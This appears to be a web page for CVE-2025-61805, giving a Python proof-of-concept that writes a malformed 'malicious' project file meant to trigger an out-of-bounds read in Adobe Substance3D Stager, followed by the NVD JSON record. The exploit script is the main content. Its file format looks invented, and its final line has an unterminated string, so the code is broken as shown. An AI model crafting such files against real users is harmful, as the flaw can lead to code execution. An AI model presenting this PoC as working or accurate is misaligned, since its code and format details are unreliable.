CVE-2025-61805

# CVE-2025-61805 - Adobe Substance3D Stager Out-of-Bounds Read PoC # This PoC demonstrates the vulnerability concept by creating a malformed file # that triggers out-of-bounds read when parsed by Substance3D - Stager <= 3.1.4 import struct import sys def create_malicious_file(filename): """ Create a crafted file that triggers OOB read in Substance3D Stager. The file mimics a valid project file structure but contains malformed data fields that cause out-of-bounds memory access. """ # File header - mimicking valid Substance3D Stager file format header = b'STGR' # Magic bytes for Stager format version = struct.pack('<I', 0x03010400) # Version 3.1.4 # Crafted chunk with oversized length field to trigger OOB read chunk_type = b'MESH' # Declared size is much larger than actual data, causing parser # to read past allocated buffer declared_size = struct.pack('<Q', 0xFFFFFFFF) # 4GB declared size actual_data = b'\x00' * 256 # Only 256 bytes of actual data # Build the malicious file payload = header + version + chunk_type + declared_size + actual_data with open(filename, 'wb') as f: f.write(payload) print(f"[+] Malicious file created: {filename}") print(f"[+] File size: {len(payload)} bytes") print(f"[+] Declared chunk size: 0x{0xFFFFFFFF:08X} bytes") print(f"[+] Actual data size: {len(actual_data)} bytes") print(f"[!] Open this file with Substance3D Stager <= 3.1.4 to trigger OOB read") if __name__ == '__main__': output_file = sys.argv[1] if len(sys.argv) > 1 else 'malicious.sbs"/> create_malicious_file(output_file)

{"cve": {"id": "CVE-2025-61805", "sourceIdentifier": "[email protected]", "published": "2025-10-14T20:15:53.103", "lastModified": "2025-10-16T17:37:23.793", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Substance3D - Stager versions 3.1.4 and earlier are affected by an out-of-bounds read vulnerability when parsing a crafted file, which could result in a read past the end of an allocated memory structure. An attacker could leverage this vulnerability to execute code in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "baseScore": 7.8, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-125"}]}], "configurations": [{"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:adobe:substance_3d_stager:*:*:*:*:*:*:*:*", "versionEndExcluding": "3.1.5", "matchCriteriaId": "AB3C6EBF-2CF4-413D-AC6B-AAF49BA08B2F"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:o:apple:macos:-:*:*:*:*:*:*:*", "matchCriteriaId": "387021A0-AF36-463C-A605-32EA7DAC172E"}, {"vulnerable": false, "criteria": "cpe:2.3:o:microsoft:windows:-:*:*:*:*:*:*:*", "matchCriteriaId": "A2572D17-1DE6-457B-99CC-64AFD54487EA"}]}]}], "references": [{"url": "https://helpx.adobe.com/security/products/substance3d_stager/apsb25-104.html", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}